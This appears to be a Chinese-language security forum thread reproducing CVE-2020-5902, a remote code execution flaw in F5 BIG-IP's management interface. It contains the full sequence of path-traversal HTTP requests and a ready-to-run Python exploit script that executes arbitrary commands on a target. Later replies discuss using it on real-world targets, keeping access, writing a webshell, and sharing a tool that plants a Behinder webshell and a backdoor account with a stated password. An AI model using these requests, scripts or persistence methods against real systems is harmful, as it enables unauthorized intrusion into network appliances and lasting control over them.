CVE-2020-5902 BIG-IP RCE漏洞复现

POST /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
Host: xxxxxx
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Sec-Fetch-User: ?1
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
DNT: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=41C2740D9D716832E72D7F00BDE3CFA3
Content-Length: 37

command=delete+cli+alias+private+list
-------------------------------------------------------------------------
POST /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
Host: xxxxxx
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Sec-Fetch-User: ?1
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
DNT: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=41C2740D9D716832E72D7F00BDE3CFA3
Content-Length: 50

command=create+cli+alias+private+list+command+bash
-------------------------------------------------------------------------------
POST /tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp HTTP/1.1
Host: xxxxxx
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Sec-Fetch-User: ?1
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
DNT: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=41C2740D9D716832E72D7F00BDE3CFA3
Content-Length: 33

content=id&fileName=%2Ftmp%2Fqqweqwe
------------------------------------------------------------------------------------
POST /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
Host: xxxxxx
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Sec-Fetch-User: ?1
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
DNT: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=41C2740D9D716832E72D7F00BDE3CFA3
Content-Length: 26

command=list+%2Ftmp%2Fqqweqwe
-------------------------------------------------------------------------------------
POST /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
Host: xxxxxx
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Sec-Fetch-User: ?1
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
DNT: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=41C2740D9D716832E72D7F00BDE3CFA3
Content-Length: 37

command=delete+cli+alias+private+list

为了不这么麻烦。弄了一个python

import requests,sys
def exp(url,cmd):
    proxies = {
        'http': 'http://127.0.0.1:8080',
        'https': 'http://127.0.0.1:8080',
    }
    burp0_url = url + "/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp"
    burp0_cookies = {"JSESSIONID": "41C2740D9D716832E72D7F00BDE3CFA3"}
    burp0_headers = {"Connection": "close", "Cache-Control": "max-age=0", "DNT": "1", "Upgrade-Insecure-Requests": "1",
                     "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36",
                     "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
                     "Sec-Fetch-Site": "none", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-User": "?1",
                     "Sec-Fetch-Dest": "document", "Accept-Language": "zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7",
                     "Content-Type": "application/x-www-form-urlencoded"}
    burp0_data = {"command": "create cli alias private list command bash"}
    burp_data = {"command": "delete cli alias private list"}
    burpq_url = url + "/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp"
    burpq_data = {"fileName": "/tmp/qwerty", "content": cmd}
    try:
        c = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp_data, proxies=proxies,
                          verify=False)
        b = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data, proxies=proxies,
                          verify=False)
        requests.post(burpq_url, headers=burp0_headers, cookies=burp0_cookies, data=burpq_data, proxies=proxies,
                      verify=False)
        print(url)
        print(b.content)
    except:
        return
    burp1_url = url + "/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp"
    burp1_data = {"command": "list /tmp/qwerty"}
    try:
        a = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp1_data, proxies=proxies,
                          verify=False)
        requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp_data, proxies=proxies,
                      verify=False)
        print(a.content)
    except:
        return

if __name__ == "__main__":
    try:
        args=sys.argv[1]
        cmd=sys.argv[2]
        if args[-1]=='/':args=args[0:-1]
        exp(url=args,cmd=cmd)
    except:
        print('python f5_rce.py https://127.0.0.1 whoami')

运行方式
python f5_rce.py http://127.0.0.1 whoami
感谢TimWhite 大哥的指导

参考1:https://github.com/jas502n/CVE-2020-5902/
参考2:https://github.com/rapid7/metasploit-framework/pull/13807/commits

4 Likes

兄弟,你有没有在实战环境下检测,好像在实际环境下,执行系统命令不起作用。你是自己搭的环境做的吗。还是说要执行命令有什么限制条件。

上面的都来自实战数据...

根据我发现的,好像只有是root用户的情况下才可以执行命令,否则不行。是什么原因呢。有遇到过吗大佬。

我上个图吧

。。命令执行很少。可能是exp的问题
源码:
链接:https://pan.baidu.com/s/1IL8wjiSueDhVtoJj5HBLaQ
提取码:jm53

链接:https://pan.baidu.com/s/1t9LxC9cxDAaVW9LK77li6g
提取码:upjd

1 Like

比起执行命令我倒是想知道有没有什么好的姿势维持权限,大部分机器都是不出网的所以什么反弹shell也都没办法,web路径的话默认是只读,重新挂载之后写了webshell但是遇到了500,不知道各位老哥有没有什么好的解决办法

你这个问题是由于tomcat环境缺少jar包导致的。得上传一个jar包可以。jar包名字ecj-4.4.jar效果图
实战中估计很难上传jar

感谢老哥指导,特此根据楼主代码写了个自动上传jar并且写马加shell的
auto.zip (2.2 MB)
运行成功后会写一份默认冰蝎在/tmui/tmui/login/images/test.jsp下,之后可以用su abcd密码password@123来提权
photo_2020-07-09_18-02-49
就是这成功率着实有点低。

1 Like